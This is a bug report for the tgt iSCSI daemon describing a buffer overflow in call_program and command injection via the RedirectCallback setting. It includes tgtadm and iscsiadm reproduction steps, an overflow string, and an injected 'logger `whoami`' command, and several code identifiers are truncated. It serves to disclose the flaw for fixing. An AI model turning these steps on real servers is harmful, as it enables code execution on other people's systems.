tgtd buffer overflow and command injection vulnerabilities
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
tgt |
New
|
Critical
|
Unassigned |
Bug Description
Reported by Jason Hullinger:
The function call_program in the tgtd daemon includes a callback function
that will run arbitrary commands. Additionally, it does not check that the
cmd argument is smaller than the allocated buffer size causing a buffer
overflow. Example and proof of concept:
usr/tgtd.c
int call_program(const char *cmd, void (*callback)(void *data, int result),
...
char *pos, arg[256];
...
str_spacecpy(&pos, cmd);
Where str_spacecpy (usr/tgtd.c) chops multiple white spaces into one white
space. It takes a dest buffer and copies into a src buffer:
void str_spacecpy(char **dest, const char *src)
call_program is called from usr/target.c in get_redirect_
static int
get_redirect_
...
if (call_program(
...
Where get_redirect_
int target_
struct iscsi_connection *conn, char *buf, int *reason)
...
char dst[INET6_
...
ret = get_redirect_
...
in_buf, size 1024, is passed to call_program as 'cmd', which then copies
into the dest char buffer of size 256 causing a buffer overflow.
In addition to that, any arbitrary command line argument that is pass in
by tgtadm will be executed. Example:
sudo tgtd -C 1 --iscsi portal=
sudo ./scripts/tgt-admin -C 1 -e -c /home/ubuntu/
(in a different shell) sudo gdb --args tgtd -f -C 2 --iscsi
portal=127.0.0.1
sudo ./scripts/tgt-admin -C 2 -e -c /home/ubuntu/
sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectAddress
--value 127.0.0.1
sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectPort
--value 860
sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectReason
--value Temporary
sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectCallback
--value
1zzzzzzzzzzzzzz
zzzzzzzzzzzzzzz
zzzzzzzzzzzzzzz
zzzzzzzzzzzzzzz
zzzzzzzzzzzzzzz
zzzzzzzzzzzzzzz
zzzzzzzzzzzzzzz
sudo iscsiadm -m discovery -t st -p 127.0.0.1
sudo iscsiadm -m node -p 127.0.0.1 -l
Upon attempting to authenticate, the command set by the --name
RedirectCallback --value tgtadm directive will attempt to be executed. If
you replace the above example with:
sudo tgtadm -C 2 --op update --mode target --tid 1 --name RedirectCallback
--value "/usr/bin/logger `whoami`"
You will see in the syslog file, where 'ubuntu' is the current user:
ubuntu iqn.2014-
I'm a bit unclear as to what exactly is suppose to happen here, or what
the intended result is, but it seems that arbitrary commands should not be
allowed to be injected from tgtadm in addition to checking the strlen of
cmd.